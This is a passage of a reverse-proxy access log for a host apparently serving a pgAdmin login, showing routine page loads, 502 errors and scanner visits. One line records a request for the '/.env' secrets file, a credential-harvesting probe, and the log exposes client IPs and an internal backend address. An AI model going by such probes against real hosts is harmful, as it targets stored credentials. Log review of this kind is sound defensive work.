pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:11:39:13 +0000] - - 502 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:11:39:14 +0000] - - 502 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:11:39:14 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:16:56:09 +0000] - - 502 - GET https db.profibot.hu "/" [Client 142.44.161.179] [Length 154] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0" "-" +[22/Jan/2026:18:40:05 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.11.122] [Length 213] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:40:05 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.11.122] [Length 2494] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:40:07 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.11.122] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:40:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.11.122] [Length 3738] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:43:39 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.11.122] [Length 213] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:43:39 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.11.122] [Length 2490] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:43:40 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.11.122] [Length 3738] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:43:40 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.11.122] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:59:35 +0000] - 302 302 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.12.67] [Length 205] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:59:35 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.12.67] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:59:35 +0000] - 302 302 - GET https db.profibot.hu "/browser/" [Client 37.76.12.67] [Length 229] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:18:59:35 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/browser/" [Client 37.76.12.67] [Length 2493] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:44:55 +0000] - 502 502 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:44:55 +0000] - 502 502 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:45:08 +0000] - 502 502 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[22/Jan/2026:22:45:08 +0000] - 502 502 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[22/Jan/2026:22:45:23 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:45:23 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:45:25 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:45:25 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:48:24 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:48:25 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:49:06 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:49:06 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 245] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:49:07 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 213] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:49:08 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.47.183] [Length 2492] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:49:08 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:49:08 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 3738] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:49:08 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.47.183] [Length 245] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:22:53:06 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:53:07 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:53:07 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:53:09 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:53:09 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:22:53:23 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:53:23 +0000] - - 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:23:03:16 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 213] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:16 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.47.183] [Length 2492] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:16 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.47.183] [Length 245] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:03:16 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 3738] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:03:16 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:07:03 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 213] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:07:03 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.47.183] [Length 2494] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:07:04 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 3738] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:07:04 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 321] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:07:43 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:07:43 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:23:07:44 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:07:44 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[22/Jan/2026:23:08:51 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.47.183] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:08:51 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.47.183] [Length 2495] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:08:52 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.47.183] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:08:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.47.183] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[22/Jan/2026:23:08:52 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.47.183] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2494] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 84.1.26.27] [Length 91437] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 84.1.26.27] [Length 7187] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 84.1.26.27] [Length 153691] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 84.1.26.27] [Length 323675] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 84.1.26.27] [Length 172313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 84.1.26.27] [Length 5996] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:23 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 84.1.26.27] [Length 2351296] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:24 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 84.1.26.27] [Length 171676] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[23/Jan/2026:06:35:24 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 84.1.26.27] [Length 134798] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:24 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:24 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:31 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:32 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2494] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:33 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:06:35:33 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[23/Jan/2026:07:27:12 +0000] - - 301 - GET http db.profibot.hu "/" [Client 206.168.34.41] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:07:31:19 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 199.45.155.107] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:07:31:24 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 199.45.155.107] [Length 2387] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:07:31:26 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 199.45.155.107] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:07:31:28 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 199.45.155.107] [Length 78998] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico?ver=91100" +[23/Jan/2026:07:31:33 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 199.45.155.107] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:07:31:36 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 199.45.155.107] [Length 78998] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico" +[23/Jan/2026:19:03:30 +0000] - 404 404 - GET https db.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[23/Jan/2026:22:43:56 +0000] - - 301 - GET http db.profibot.hu "/" [Client 18.213.106.41] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36" "-" +[23/Jan/2026:22:43:56 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 18.213.106.41] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36" "-" +[23/Jan/2026:22:43:57 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 18.213.106.41] [Length 2391] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36" "-" +[24/Jan/2026:07:11:59 +0000] - - 301 - GET http db.profibot.hu "/robots.txt" [Client 74.7.230.46] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" 